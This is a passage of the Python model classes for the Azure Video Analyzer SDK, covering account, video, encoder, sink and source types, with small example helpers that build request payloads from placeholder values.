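# Illustrative sketch (hypothetical helper): RTSP camera credentials. As noted in the
# docstring, the password should normally be supplied as a secret parameter rather than
# hard-coded; the literal below is a placeholder only.
def _example_rtsp_credentials():
    return UsernamePasswordCredentials(
        username='camera-admin',
        password='<secret-parameter>',
    )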
class VideoAnalyzer(TrackedResource):
"""The Video Analyzer account.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
:param tags: A set of tags. Resource tags.
:type tags: dict[str, str]
:param location: Required. The geo-location where the resource lives.
:type location: str
:param identity: The identities associated to the Video Analyzer resource.
:type identity: ~video_analyzer.models.VideoAnalyzerIdentity
:param storage_accounts: The storage accounts for this resource.
:type storage_accounts: list[~video_analyzer.models.StorageAccount]
:ivar endpoints: The endpoints associated with this resource.
:vartype endpoints: list[~video_analyzer.models.Endpoint]
:param encryption: The account encryption properties.
:type encryption: ~video_analyzer.models.AccountEncryption
:param iot_hubs: The IoT Hubs for this resource.
:type iot_hubs: list[~video_analyzer.models.IotHub]
:param public_network_access: Whether or not public network access is allowed for resources
under the Video Analyzer account. Possible values include: "Enabled", "Disabled".
:type public_network_access: str or ~video_analyzer.models.PublicNetworkAccess
:param network_access_control: Network access control for Video Analyzer.
:type network_access_control: ~video_analyzer.models.NetworkAccessControl
:ivar provisioning_state: Provisioning state of the Video Analyzer account. Possible values
include: "Failed", "InProgress", "Succeeded".
:vartype provisioning_state: str or ~video_analyzer.models.ProvisioningState
:ivar private_endpoint_connections: Private Endpoint Connections created under Video Analyzer
account.
:vartype private_endpoint_connections: list[~video_analyzer.models.PrivateEndpointConnection]
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
'location': {'required': True},
'endpoints': {'readonly': True},
'provisioning_state': {'readonly': True},
'private_endpoint_connections': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
'tags': {'key': 'tags', 'type': '{str}'},
'location': {'key': 'location', 'type': 'str'},
'identity': {'key': 'identity', 'type': 'VideoAnalyzerIdentity'},
'storage_accounts': {'key': 'properties.storageAccounts', 'type': '[StorageAccount]'},
'endpoints': {'key': 'properties.endpoints', 'type': '[Endpoint]'},
'encryption': {'key': 'properties.encryption', 'type': 'AccountEncryption'},
'iot_hubs': {'key': 'properties.iotHubs', 'type': '[IotHub]'},
'public_network_access': {'key': 'properties.publicNetworkAccess', 'type': 'str'},
'network_access_control': {'key': 'properties.networkAccessControl', 'type': 'NetworkAccessControl'},
'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},
'private_endpoint_connections': {'key': 'properties.privateEndpointConnections', 'type': '[PrivateEndpointConnection]'},
}
def __init__(
self,
**kwargs
):
super(VideoAnalyzer, self).__init__(**kwargs)
self.identity = kwargs.get('identity', None)
self.storage_accounts = kwargs.get('storage_accounts', None)
self.endpoints = None
self.encryption = kwargs.get('encryption', None)
self.iot_hubs = kwargs.get('iot_hubs', None)
self.public_network_access = kwargs.get('public_network_access', None)
self.network_access_control = kwargs.get('network_access_control', None)
self.provisioning_state = None
self.private_endpoint_connections = None
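# Illustrative sketch (hypothetical helper; the resource IDs and identity type string are
# placeholders): a minimal account payload with one storage account and a user-assigned
# identity. Read-only properties (endpoints, provisioning_state, ...) are populated by
# the server and therefore not set here.
def _example_video_analyzer_account():
    identity_resource_id = (
        '/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/my-rg'
        '/providers/Microsoft.ManagedIdentity/userAssignedIdentities/va-identity'
    )
    return VideoAnalyzer(
        location='westus2',
        tags={'env': 'dev'},
        identity=VideoAnalyzerIdentity(
            type='UserAssigned',
            user_assigned_identities={identity_resource_id: UserAssignedManagedIdentity()},
        ),
        storage_accounts=[
            StorageAccount(
                id='/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/my-rg'
                   '/providers/Microsoft.Storage/storageAccounts/mystorageaccount',
            ),
        ],
    )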
class VideoAnalyzerCollection(msrest.serialization.Model):
"""A collection of VideoAnalyzer items.
:param value: A collection of VideoAnalyzer items.
:type value: list[~video_analyzer.models.VideoAnalyzer]
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[VideoAnalyzer]'},
}
def __init__(
self,
**kwargs
):
super(VideoAnalyzerCollection, self).__init__(**kwargs)
self.value = kwargs.get('value', None)
class VideoAnalyzerIdentity(msrest.serialization.Model):
"""The managed identity for the Video Analyzer resource.
All required parameters must be populated in order to send to Azure.
:param type: Required. The identity type.
:type type: str
:param user_assigned_identities: The User Assigned Managed Identities.
:type user_assigned_identities: dict[str, ~video_analyzer.models.UserAssignedManagedIdentity]
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': 'type', 'type': 'str'},
'user_assigned_identities': {'key': 'userAssignedIdentities', 'type': '{UserAssignedManagedIdentity}'},
}
def __init__(
self,
**kwargs
):
super(VideoAnalyzerIdentity, self).__init__(**kwargs)
self.type = kwargs['type']
self.user_assigned_identities = kwargs.get('user_assigned_identities', None)
class VideoAnalyzerOperationStatus(msrest.serialization.Model):
"""Status of video analyzer operation.
All required parameters must be populated in order to send to Azure.
:param name: Required. Operation identifier.
:type name: str
:param id: Operation resource ID.
:type id: str
:param start_time: Operation start time.
:type start_time: str
:param end_time: Operation end time.
:type end_time: str
:param status: Operation status.
:type status: str
:param error: The error detail.
:type error: ~video_analyzer.models.ErrorDetail
"""
_validation = {
'name': {'required': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'start_time': {'key': 'startTime', 'type': 'str'},
'end_time': {'key': 'endTime', 'type': 'str'},
'status': {'key': 'status', 'type': 'str'},
'error': {'key': 'error', 'type': 'ErrorDetail'},
}
def __init__(
self,
**kwargs
):
super(VideoAnalyzerOperationStatus, self).__init__(**kwargs)
self.name = kwargs['name']
self.id = kwargs.get('id', None)
self.start_time = kwargs.get('start_time', None)
self.end_time = kwargs.get('end_time', None)
self.status = kwargs.get('status', None)
self.error = kwargs.get('error', None)
class VideoAnalyzerPrivateEndpointConnectionOperationStatus(msrest.serialization.Model):
"""Status of private endpoint connection operation.
All required parameters must be populated in order to send to Azure.
:param name: Required. Operation identifier.
:type name: str
:param id: Operation resource ID.
:type id: str
:param start_time: Operation start time.
:type start_time: str
:param end_time: Operation end time.
:type end_time: str
:param status: Operation status.
:type status: str
:param error: The error detail.
:type error: ~video_analyzer.models.ErrorDetail
"""
_validation = {
'name': {'required': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'start_time': {'key': 'startTime', 'type': 'str'},
'end_time': {'key': 'endTime', 'type': 'str'},
'status': {'key': 'status', 'type': 'str'},
'error': {'key': 'error', 'type': 'ErrorDetail'},
}
def __init__(
self,
**kwargs
):
super(VideoAnalyzerPrivateEndpointConnectionOperationStatus, self).__init__(**kwargs)
self.name = kwargs['name']
self.id = kwargs.get('id', None)
self.start_time = kwargs.get('start_time', None)
self.end_time = kwargs.get('end_time', None)
self.status = kwargs.get('status', None)
self.error = kwargs.get('error', None)
class VideoAnalyzerUpdate(msrest.serialization.Model):
"""The update operation for a Video Analyzer account.
Variables are only populated by the server, and will be ignored when sending a request.
:param tags: A set of tags. Resource tags.
:type tags: dict[str, str]
:param identity: The identities associated to the Video Analyzer resource.
:type identity: ~video_analyzer.models.VideoAnalyzerIdentity
:param storage_accounts: The storage accounts for this resource.
:type storage_accounts: list[~video_analyzer.models.StorageAccount]
:ivar endpoints: The endpoints associated with this resource.
:vartype endpoints: list[~video_analyzer.models.Endpoint]
:param encryption: The account encryption properties.
:type encryption: ~video_analyzer.models.AccountEncryption
:param iot_hubs: The IoT Hubs for this resource.
:type iot_hubs: list[~video_analyzer.models.IotHub]
:param public_network_access: Whether or not public network access is allowed for resources
under the Video Analyzer account. Possible values include: "Enabled", "Disabled".
:type public_network_access: str or ~video_analyzer.models.PublicNetworkAccess
:param network_access_control: Network access control for Video Analyzer.
:type network_access_control: ~video_analyzer.models.NetworkAccessControl
:ivar provisioning_state: Provisioning state of the Video Analyzer account. Possible values
include: "Failed", "InProgress", "Succeeded".
:vartype provisioning_state: str or ~video_analyzer.models.ProvisioningState
:ivar private_endpoint_connections: Private Endpoint Connections created under Video Analyzer
account.
:vartype private_endpoint_connections: list[~video_analyzer.models.PrivateEndpointConnection]
"""
_validation = {
'endpoints': {'readonly': True},
'provisioning_state': {'readonly': True},
'private_endpoint_connections': {'readonly': True},
}
_attribute_map = {
'tags': {'key': 'tags', 'type': '{str}'},
'identity': {'key': 'identity', 'type': 'VideoAnalyzerIdentity'},
'storage_accounts': {'key': 'properties.storageAccounts', 'type': '[StorageAccount]'},
'endpoints': {'key': 'properties.endpoints', 'type': '[Endpoint]'},
'encryption': {'key': 'properties.encryption', 'type': 'AccountEncryption'},
'iot_hubs': {'key': 'properties.iotHubs', 'type': '[IotHub]'},
'public_network_access': {'key': 'properties.publicNetworkAccess', 'type': 'str'},
'network_access_control': {'key': 'properties.networkAccessControl', 'type': 'NetworkAccessControl'},
'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},
'private_endpoint_connections': {'key': 'properties.privateEndpointConnections', 'type': '[PrivateEndpointConnection]'},
}
def __init__(
self,
**kwargs
):
super(VideoAnalyzerUpdate, self).__init__(**kwargs)
self.tags = kwargs.get('tags', None)
self.identity = kwargs.get('identity', None)
self.storage_accounts = kwargs.get('storage_accounts', None)
self.endpoints = None
self.encryption = kwargs.get('encryption', None)
self.iot_hubs = kwargs.get('iot_hubs', None)
self.public_network_access = kwargs.get('public_network_access', None)
self.network_access_control = kwargs.get('network_access_control', None)
self.provisioning_state = None
self.private_endpoint_connections = None
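# Illustrative sketch (hypothetical helper): an update payload that only changes tags and
# the public network access flag; 'Disabled' is one of the documented PublicNetworkAccess
# values.
def _example_video_analyzer_update():
    return VideoAnalyzerUpdate(
        tags={'env': 'prod', 'owner': 'media-team'},
        public_network_access='Disabled',
    )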
class VideoArchival(msrest.serialization.Model):
"""Video archival properties.
:param retention_period: Video retention period indicates the maximum age of the video archive
segments which are intended to be kept in storage. It must be provided in the ISO8601 duration
format in the granularity of days, up to a maximum of 10 years. For example, if this is set to
P30D (30 days), content older than 30 days will be periodically deleted. This value can be
updated at any time and the new desired retention period will be effective within 24 hours.
:type retention_period: str
"""
_attribute_map = {
'retention_period': {'key': 'retentionPeriod', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(VideoArchival, self).__init__(**kwargs)
self.retention_period = kwargs.get('retention_period', None)
class VideoContentToken(msrest.serialization.Model):
    """Video content token grants access to the video content URLs.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar expiration_date: The content token expiration date in ISO8601 format (eg.
2021-01-01T00:00:00Z).
:vartype expiration_date: ~datetime.datetime
:ivar token: The content token value to be added to the video content URL as the value for the
"token" query string parameter. The token is specific to a single video.
:vartype token: str
"""
_validation = {
'expiration_date': {'readonly': True},
'token': {'readonly': True},
}
_attribute_map = {
'expiration_date': {'key': 'expirationDate', 'type': 'iso-8601'},
'token': {'key': 'token', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(VideoContentToken, self).__init__(**kwargs)
self.expiration_date = None
self.token = None
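# Illustrative sketch (hypothetical helper): per the docstring above, the token value is
# passed as the 'token' query string parameter when requesting video content.
def _example_append_content_token(content_url, content_token):
    # content_token is a VideoContentToken returned by the service; its fields are
    # read-only and already populated.
    separator = '&' if '?' in content_url else '?'
    return '{0}{1}token={2}'.format(content_url, separator, content_token.token)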
class VideoContentUrls(msrest.serialization.Model):
"""Set of URLs to the video content.
:param download_url: Video file download URL. This URL can be used in conjunction with the
video content authorization token to download the video MP4 file. The resulting MP4 file can be
     played on any standard media player. It is available when the video type is 'file' and
     the video file is available for consumption.
:type download_url: str
:param archive_base_url: Video archive streaming base URL. The archived content can be
automatically played by the Azure Video Analyzer player widget. Alternatively, this URL can be
used in conjunction with the video content authorization token on any compatible DASH or HLS
players by appending the following to the base URL:
.. code-block::
- HLSv4: /manifest(format=m3u8-aapl).m3u8
- HLS CMAF: /manifest(format=m3u8-cmaf)
- DASH CMAF: /manifest(format=mpd-time-cmaf)
     Moreover, an ongoing video recording can be played in "live mode" with latencies that are
     approximately double the chosen video segment length. It is available when the video type
     is 'archive' and video archiving is enabled.
:type archive_base_url: str
:param rtsp_tunnel_url: Video low-latency streaming URL. The live content can be automatically
played by the Azure Video Analyzer player widget. Alternatively, this URL can be used in
conjunction with the video content authorization token to expose a WebSocket tunneled RTSP
stream. It is available when the video type is 'archive' and a live, low-latency feed is
available from the source.
:type rtsp_tunnel_url: str
:param preview_image_urls: Video preview image URLs. These URLs can be used in conjunction with
the video content authorization token to download the most recent still image from the video
archive in different resolutions. They are available when the video type is 'archive' and
preview images are enabled.
:type preview_image_urls: ~video_analyzer.models.VideoPreviewImageUrls
"""
_attribute_map = {
'download_url': {'key': 'downloadUrl', 'type': 'str'},
'archive_base_url': {'key': 'archiveBaseUrl', 'type': 'str'},
'rtsp_tunnel_url': {'key': 'rtspTunnelUrl', 'type': 'str'},
'preview_image_urls': {'key': 'previewImageUrls', 'type': 'VideoPreviewImageUrls'},
}
def __init__(
self,
**kwargs
):
super(VideoContentUrls, self).__init__(**kwargs)
self.download_url = kwargs.get('download_url', None)
self.archive_base_url = kwargs.get('archive_base_url', None)
self.rtsp_tunnel_url = kwargs.get('rtsp_tunnel_url', None)
self.preview_image_urls = kwargs.get('preview_image_urls', None)
class VideoCreationProperties(msrest.serialization.Model):
"""Optional properties to be used in case a new video resource needs to be created on the service. These will not take effect if the video already exists.
:param title: Optional title provided by the user. Value can be up to 256 characters long.
:type title: str
:param description: Optional description provided by the user. Value can be up to 2048
characters long.
:type description: str
:param segment_length: Segment length indicates the length of individual content files
(segments) which are persisted to storage. Smaller segments provide lower archive playback
latency but generate larger volume of storage transactions. Larger segments reduce the amount
of storage transactions while increasing the archive playback latency. Value must be specified
     in ISO8601 duration format (i.e. "PT30S" equals 30 seconds) and can vary from 30 seconds
     to 5 minutes, in 30-second increments. Changing this value after the initial call to create the
video resource can lead to errors when uploading content to the archive. Default value is 30
seconds. This property is only allowed for topologies where "kind" is set to "live".
:type segment_length: str
:param retention_period: Video retention period indicates how long the video is kept in
     storage. Value must be specified in ISO8601 duration format (i.e. "P1D" equals 1 day) and
     can vary from 1 day to 10 years, in 1-day increments. When absent (null), all video content is
retained indefinitely. This property is only allowed for topologies where "kind" is set to
"live".
:type retention_period: str
"""
_attribute_map = {
'title': {'key': 'title', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
'segment_length': {'key': 'segmentLength', 'type': 'str'},
'retention_period': {'key': 'retentionPeriod', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(VideoCreationProperties, self).__init__(**kwargs)
self.title = kwargs.get('title', None)
self.description = kwargs.get('description', None)
self.segment_length = kwargs.get('segment_length', None)
self.retention_period = kwargs.get('retention_period', None)
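# Illustrative sketch (hypothetical helper, placeholder values): creation-time properties
# for a new 'live' video resource using 30-second segments and a 30-day retention period,
# in the ISO8601 formats described above.
def _example_video_creation_properties():
    return VideoCreationProperties(
        title='Parking lot camera',
        description='Main entrance, north side',
        segment_length='PT30S',   # 30-second segments
        retention_period='P30D',  # keep content for 30 days
    )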
class VideoEncoderBase(msrest.serialization.Model):
"""Base type for all video encoding presets, which define the recipe or instructions on how the input video should be processed.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: VideoEncoderH264.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param bitrate_kbps: The maximum bitrate, in kilobits per second or Kbps, at which video should
     be encoded. If omitted, the encoder sets it automatically to try and match the quality of the input
video.
:type bitrate_kbps: str
:param frame_rate: The frame rate (in frames per second) of the encoded video. The value must
be greater than zero, and less than or equal to 300. If omitted, the encoder uses the average
frame rate of the input video.
:type frame_rate: str
:param scale: Describes the resolution of the encoded video. If omitted, the encoder uses the
resolution of the input video.
:type scale: ~video_analyzer.models.VideoScale
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'bitrate_kbps': {'key': 'bitrateKbps', 'type': 'str'},
'frame_rate': {'key': 'frameRate', 'type': 'str'},
'scale': {'key': 'scale', 'type': 'VideoScale'},
}
_subtype_map = {
'type': {'#Microsoft.VideoAnalyzer.VideoEncoderH264': 'VideoEncoderH264'}
}
def __init__(
self,
**kwargs
):
super(VideoEncoderBase, self).__init__(**kwargs)
self.type = None # type: Optional[str]
self.bitrate_kbps = kwargs.get('bitrate_kbps', None)
self.frame_rate = kwargs.get('frame_rate', None)
self.scale = kwargs.get('scale', None)
class VideoEncoderH264(VideoEncoderBase):
"""A custom preset for encoding video with the H.264 (AVC) codec.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param bitrate_kbps: The maximum bitrate, in kilobits per second or Kbps, at which video should
     be encoded. If omitted, the encoder sets it automatically to try and match the quality of the input
video.
:type bitrate_kbps: str
:param frame_rate: The frame rate (in frames per second) of the encoded video. The value must
be greater than zero, and less than or equal to 300. If omitted, the encoder uses the average
frame rate of the input video.
:type frame_rate: str
:param scale: Describes the resolution of the encoded video. If omitted, the encoder uses the
resolution of the input video.
:type scale: ~video_analyzer.models.VideoScale
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'bitrate_kbps': {'key': 'bitrateKbps', 'type': 'str'},
'frame_rate': {'key': 'frameRate', 'type': 'str'},
'scale': {'key': 'scale', 'type': 'VideoScale'},
}
def __init__(
self,
**kwargs
):
super(VideoEncoderH264, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.VideoEncoderH264' # type: str
class VideoEntity(ProxyResource):
"""Represents a video resource within Azure Video Analyzer. Videos can be ingested from RTSP cameras through live pipelines or can be created by exporting sequences from existing captured video through a pipeline job. Videos ingested through live pipelines can be streamed through Azure Video Analyzer Player Widget or compatible players. Exported videos can be downloaded as MP4 files.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
:param title: Optional video title provided by the user. Value can be up to 256 characters
long.
:type title: str
:param description: Optional video description provided by the user. Value can be up to 2048
characters long.
:type description: str
:ivar type_properties_type: Video content type. Different content types are suitable for
different applications and scenarios. Possible values include: "Archive", "File".
:vartype type_properties_type: str or ~video_analyzer.models.VideoType
:ivar flags: Video flags contain information about the available video actions and its dynamic
properties based on the current video state.
:vartype flags: ~video_analyzer.models.VideoFlags
:ivar content_urls: Set of URLs to the video content.
:vartype content_urls: ~video_analyzer.models.VideoContentUrls
:param media_info: Contains information about the video and audio content.
:type media_info: ~video_analyzer.models.VideoMediaInfo
:param archival: Video archival properties.
:type archival: ~video_analyzer.models.VideoArchival
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
'type_properties_type': {'readonly': True},
'flags': {'readonly': True},
'content_urls': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
'title': {'key': 'properties.title', 'type': 'str'},
'description': {'key': 'properties.description', 'type': 'str'},
'type_properties_type': {'key': 'properties.type', 'type': 'str'},
'flags': {'key': 'properties.flags', 'type': 'VideoFlags'},
'content_urls': {'key': 'properties.contentUrls', 'type': 'VideoContentUrls'},
'media_info': {'key': 'properties.mediaInfo', 'type': 'VideoMediaInfo'},
'archival': {'key': 'properties.archival', 'type': 'VideoArchival'},
}
def __init__(
self,
**kwargs
):
super(VideoEntity, self).__init__(**kwargs)
self.title = kwargs.get('title', None)
self.description = kwargs.get('description', None)
self.type_properties_type = None
self.flags = None
self.content_urls = None
self.media_info = kwargs.get('media_info', None)
self.archival = kwargs.get('archival', None)
class VideoEntityCollection(msrest.serialization.Model):
"""A collection of VideoEntity items.
:param value: A collection of VideoEntity items.
:type value: list[~video_analyzer.models.VideoEntity]
:param next_link: A link to the next page of the collection (when the collection contains too
many results to return in one response).
:type next_link: str
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[VideoEntity]'},
'next_link': {'key': '@nextLink', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(VideoEntityCollection, self).__init__(**kwargs)
self.value = kwargs.get('value', None)
self.next_link = kwargs.get('next_link', None)
class VideoFlags(msrest.serialization.Model):
"""Video flags contain information about the available video actions and its dynamic properties based on the current video state.
All required parameters must be populated in order to send to Azure.
:param can_stream: Required. Value indicating whether or not the video can be streamed. Only
"archive" type videos can be streamed.
:type can_stream: bool
:param has_data: Required. Value indicating whether or not there has ever been data recorded or
uploaded into the video. Newly created videos have this value set to false.
:type has_data: bool
:param is_in_use: Required. Value indicating whether or not the video is currently being
     referenced by an active pipeline. The fact that it is being referenced doesn't necessarily
     indicate that data is being received. For example, video recording may be gated on events,
     or the camera may not be accessible at the time.
:type is_in_use: bool
"""
_validation = {
'can_stream': {'required': True},
'has_data': {'required': True},
'is_in_use': {'required': True},
}
_attribute_map = {
'can_stream': {'key': 'canStream', 'type': 'bool'},
'has_data': {'key': 'hasData', 'type': 'bool'},
'is_in_use': {'key': 'isInUse', 'type': 'bool'},
}
def __init__(
self,
**kwargs
):
super(VideoFlags, self).__init__(**kwargs)
self.can_stream = kwargs['can_stream']
self.has_data = kwargs['has_data']
self.is_in_use = kwargs['is_in_use']
class VideoMediaInfo(msrest.serialization.Model):
"""Contains information about the video and audio content.
:param segment_length: Video segment length indicates the length of individual video files
(segments) which are persisted to storage. Smaller segments provide lower archive playback
latency but generate larger volume of storage transactions. Larger segments reduce the amount
of storage transactions while increasing the archive playback latency. Value must be specified
     in ISO8601 duration format (i.e. "PT30S" equals 30 seconds) and can vary from 30 seconds
     to 5 minutes, in 30-second increments.
:type segment_length: str
"""
_attribute_map = {
'segment_length': {'key': 'segmentLength', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(VideoMediaInfo, self).__init__(**kwargs)
self.segment_length = kwargs.get('segment_length', None)
class VideoPreviewImageUrls(msrest.serialization.Model):
"""Video preview image URLs. These URLs can be used in conjunction with the video content authorization token to download the most recent still image from the video archive in different resolutions. They are available when the video type is 'archive' and preview images are enabled.
:param small: Low resolution preview image URL.
:type small: str
:param medium: Medium resolution preview image URL.
:type medium: str
:param large: High resolution preview image URL.
:type large: str
"""
_attribute_map = {
'small': {'key': 'small', 'type': 'str'},
'medium': {'key': 'medium', 'type': 'str'},
'large': {'key': 'large', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(VideoPreviewImageUrls, self).__init__(**kwargs)
self.small = kwargs.get('small', None)
self.medium = kwargs.get('medium', None)
self.large = kwargs.get('large', None)
class VideoPublishingOptions(msrest.serialization.Model):
"""Optional flags used to change how video is published. These are only allowed for topologies where "kind" is set to "live".
    :param disable_archive: When set to 'true', content will not be archived or recorded. This is
used, for example, when the topology is used only for low latency video streaming. Default is
'false'. If set to 'true', then "disableRtspPublishing" must be set to 'false'.
:type disable_archive: str
    :param disable_rtsp_publishing: When set to 'true', the RTSP playback URL will not be published,
disabling low latency streaming. This is used, for example, when the topology is used only for
archiving content. Default is 'false'. If set to 'true', then "disableArchive" must be set to
'false'.
:type disable_rtsp_publishing: str
"""
_attribute_map = {
'disable_archive': {'key': 'disableArchive', 'type': 'str'},
'disable_rtsp_publishing': {'key': 'disableRtspPublishing', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(VideoPublishingOptions, self).__init__(**kwargs)
self.disable_archive = kwargs.get('disable_archive', None)
self.disable_rtsp_publishing = kwargs.get('disable_rtsp_publishing', None)
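# Illustrative sketch (hypothetical helper): publish only the low-latency RTSP stream and
# skip archiving. As documented above, the two flags cannot both be set to 'true'.
def _example_streaming_only_publishing():
    return VideoPublishingOptions(
        disable_archive='true',
        disable_rtsp_publishing='false',
    )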
class VideoScale(msrest.serialization.Model):
"""The video scaling information.
:param height: The desired output video height.
:type height: str
:param width: The desired output video width.
:type width: str
:param mode: Describes the video scaling mode to be applied. Default mode is 'Pad'. If the mode
is 'Pad' or 'Stretch' then both width and height must be specified. Else if the mode is
'PreserveAspectRatio' then only one of width or height need be provided. Possible values
include: "Pad", "PreserveAspectRatio", "Stretch".
:type mode: str or ~video_analyzer.models.VideoScaleMode
"""
_attribute_map = {
'height': {'key': 'height', 'type': 'str'},
'width': {'key': 'width', 'type': 'str'},
'mode': {'key': 'mode', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(VideoScale, self).__init__(**kwargs)
self.height = kwargs.get('height', None)
self.width = kwargs.get('width', None)
self.mode = kwargs.get('mode', None)
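# Illustrative sketch (hypothetical helper, placeholder values): an H.264 preset that caps
# the bitrate and downscales to 720p while preserving the aspect ratio, so only the height
# needs to be given.
def _example_h264_preset():
    return VideoEncoderH264(
        bitrate_kbps='2000',
        frame_rate='30',
        scale=VideoScale(height='720', mode='PreserveAspectRatio'),
    )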
class VideoSequenceAbsoluteTimeMarkers(TimeSequenceBase):
    """A sequence of absolute datetime ranges as a string. The datetime values should follow ISO8601, and the sum of the ranges should add up to 24 hours or less. Currently, there can be only one range specified in the sequence.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param ranges: Required. The sequence of datetime ranges. Example: '[["2021-10-05T03:30:00Z",
"2021-10-05T03:40:00Z"]]'.
:type ranges: str
"""
_validation = {
'type': {'required': True},
'ranges': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'ranges': {'key': 'ranges', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(VideoSequenceAbsoluteTimeMarkers, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.VideoSequenceAbsoluteTimeMarkers' # type: str
self.ranges = kwargs['ranges']
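# Illustrative sketch (hypothetical helper): selecting a ten-minute window of recorded
# video for a batch pipeline job. The ranges value is a JSON-style string holding a single
# datetime range, as described in the docstring above.
def _example_time_sequence():
    return VideoSequenceAbsoluteTimeMarkers(
        ranges='[["2021-10-05T03:30:00Z", "2021-10-05T03:40:00Z"]]',
    )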
class VideoSink(SinkNodeBase):
"""Video sink in a live topology allows for video and audio to be captured, optionally archived, and published via a video resource. If archiving is enabled, this results in a video of type 'archive'. If used in a batch topology, this allows for video and audio to be stored as a file, and published via a video resource of type 'file'.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param name: Required. Node name. Must be unique within the topology.
:type name: str
:param inputs: Required. An array of upstream node references within the topology to be used as
inputs for this node.
:type inputs: list[~video_analyzer.models.NodeInput]
:param video_name: Required. Name of a new or existing video resource used to capture and
     publish content. Note: if downstream of an RTSP source, and if disableArchive is set to true,
     then no content is archived.
:type video_name: str
:param video_creation_properties: Optional video properties to be used in case a new video
resource needs to be created on the service.
:type video_creation_properties: ~video_analyzer.models.VideoCreationProperties
:param video_publishing_options: Options to change how the video sink publishes content via the
video resource. This property is only allowed for topologies where "kind" is set to "live".
:type video_publishing_options: ~video_analyzer.models.VideoPublishingOptions
"""
_validation = {
'type': {'required': True},
'name': {'required': True},
'inputs': {'required': True},
'video_name': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'inputs': {'key': 'inputs', 'type': '[NodeInput]'},
'video_name': {'key': 'videoName', 'type': 'str'},
'video_creation_properties': {'key': 'videoCreationProperties', 'type': 'VideoCreationProperties'},
'video_publishing_options': {'key': 'videoPublishingOptions', 'type': 'VideoPublishingOptions'},
}
def __init__(
self,
**kwargs
):
super(VideoSink, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.VideoSink' # type: str
self.video_name = kwargs['video_name']
self.video_creation_properties = kwargs.get('video_creation_properties', None)
self.video_publishing_options = kwargs.get('video_publishing_options', None)
class VideoSource(SourceNodeBase):
"""Video source allows for content from a Video Analyzer video resource to be ingested into a pipeline. Currently supported only with batch pipelines.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types.Constant filled by server.
:type type: str
:param name: Required. Node name. Must be unique within the topology.
:type name: str
:param video_name: Required. Name of the Video Analyzer video resource to be used as the
source.
:type video_name: str
:param time_sequences: Required. Describes a sequence of datetime ranges. The video source only
picks up recorded media within these ranges.
:type time_sequences: ~video_analyzer.models.TimeSequenceBase
"""
_validation = {
'type': {'required': True},
'name': {'required': True},
'video_name': {'required': True},
'time_sequences': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
